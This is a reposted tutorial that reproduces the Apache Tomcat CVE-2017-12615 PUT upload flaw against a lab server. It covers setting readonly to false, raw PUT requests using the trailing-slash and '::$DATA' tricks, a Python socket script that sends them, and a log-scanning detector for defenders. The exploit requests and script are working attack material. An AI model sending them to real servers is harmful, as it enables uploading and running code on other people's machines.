Tomcat CVE-2017-12615 Remote Upload Vulnerability Reproduction

Source: Internet
Author: User

Vulnerability name: CVE-2017-12615, remote code execution vulnerability

When Tomcat is running on the Windows operating system and the HTTP PUT request method is enabled (for example, by setting the readonly initialization parameter to false), an attacker may be able to upload a JSP file containing arbitrary code to the server through a crafted request. The server will then execute the code in the JSP file, which can lead to data disclosure on the server or to the attacker obtaining server permissions.

The above two vulnerabilities allow arbitrary code to be executed on the user's server, resulting in data leakage or in the attacker gaining server permissions, so they pose a high security risk.

Impact Range: Apache Tomcat 7.0.0-7.0.81

First, download version 7.0.81 from the Tomcat website.

Download Link: http://mirrors.shuosc.org/apache/tomcat/tomcat-7/v7.0.81/bin/apache-tomcat-7.0.81.tar.gz

Unpack the apache-tomcat-7.0.81.tar.gz file on Linux and put it into the /usr/local/ directory.

Enter the bin directory in a terminal and run ./startup.sh to start Tomcat.

Subsequent access to http://192.168.149.129:8080 provides access to the

Exploit steps

There is a web.xml file in the /conf/ directory. Open it and add the readonly parameter with the value false.

Then send a PUT request to the target server:

    PUT /123.html/ HTTP/1.1
    Host: 192.168.149.129:8080
    User-Agent: Mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
    DNT: 1
    Connection: close
    Content-Length: 664

    <HTML><Head><title>Hack by SF</title></Head><Body>hack by sf!</Body></HTML>

This request creates a 123.html file in the web root of the target.

Here we write a script using Python.

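The code is as follows:

    import socket

    # Body to upload; left empty here, as in the original listing.
    poc = ""
    body = poc.encode()

    # Content-Length is computed from the body so the header matches what is sent.
    buffer = (
        "PUT /123.html/ HTTP/1.1\r\n"
        "Host: 192.168.149.129:8080\r\n"
        "User-Agent: Mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
        "DNT: 1\r\n"
        "Connection: close\r\n"
        "Content-Length: " + str(len(body)) + "\r\n\r\n"
    ).encode() + body

    expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    expl.connect(("192.168.149.129", 8080))
    expl.sendall(buffer)
    expl.close()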

After running:

Modify the suffix of 123.html to upload any file.

Also attached is the Tomcat 7.0.79 PoC:

    PUT /aedoo.jsp::$DATA HTTP/1.1
    Host: 192.168.1.1:8080
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8
    Cookie:
    Connection: close
    Content-Length: 22

    your JSP ma
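For defenders, the two request forms above (a trailing slash after the file name, and the ::$DATA suffix) can be searched for in Tomcat access logs. The following is an added example, not code from the original page; it assumes the AccessLogValve "common" log pattern, and its sample log lines are constructed.

```python
import re

# Assumed log format: Tomcat AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b).
LINE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>.*) HTTP/[\d.]+" (?P<status>\d{3}) \S+$'
)
# Path forms taken from the two requests shown on this page.
TRAILING_SLASH = re.compile(r'\.\w+/$')                    # /123.html/
NTFS_STREAM = re.compile(r'::\$DATA$', re.I)               # /aedoo.jsp::$DATA
JSP_TARGET = re.compile(r'\.jspx?(?:/|::\$DATA)?$', re.I)  # JSP behind either form

def classify(line):
    """Return None or (severity, reasons) for one access-log line."""
    m = LINE.match(line)
    if not m or m['method'] != 'PUT':
        return None
    path = m['path']
    # DefaultServlet answers 201 when a PUT creates a file, 204 when it overwrites one.
    written = m['status'] in ('201', '204')
    reasons = []
    if TRAILING_SLASH.search(path):
        reasons.append('trailing slash after file name')
    if NTFS_STREAM.search(path):
        reasons.append('NTFS ::$DATA suffix')
    is_jsp = bool(JSP_TARGET.search(path))
    if is_jsp:
        reasons.append('JSP target')
    if written:
        # Any accepted PUT means readonly=false; a written JSP is executable content.
        return ('critical' if is_jsp else 'high', reasons or ['PUT accepted'])
    return ('info', reasons) if reasons else None

def scan(lines):
    """Return (line_number, severity, reasons) for every flagged line."""
    found = ((n, classify(l.strip())) for n, l in enumerate(lines, 1))
    return [(n, *v) for n, v in found if v]

# Constructed sample log lines (not captured from a real server).
SAMPLE = [
    '192.168.149.1 - - [20/Sep/2017:10:01:02 +0800] "GET /index.jsp HTTP/1.1" 200 11452',
    '192.168.149.1 - - [20/Sep/2017:10:01:09 +0800] "PUT /123.html/ HTTP/1.1" 201 -',
    '192.168.149.1 - - [20/Sep/2017:10:01:30 +0800] "PUT /aedoo.jsp::$DATA HTTP/1.1" 201 -',
    '192.168.149.1 - - [20/Sep/2017:10:02:00 +0800] "PUT /aedoo.jsp/ HTTP/1.1" 403 -',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE):
        print(hit)
```

A "high" or "critical" hit means the server accepted a PUT, so the readonly parameter in conf/web.xml should be checked and any written file reviewed.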
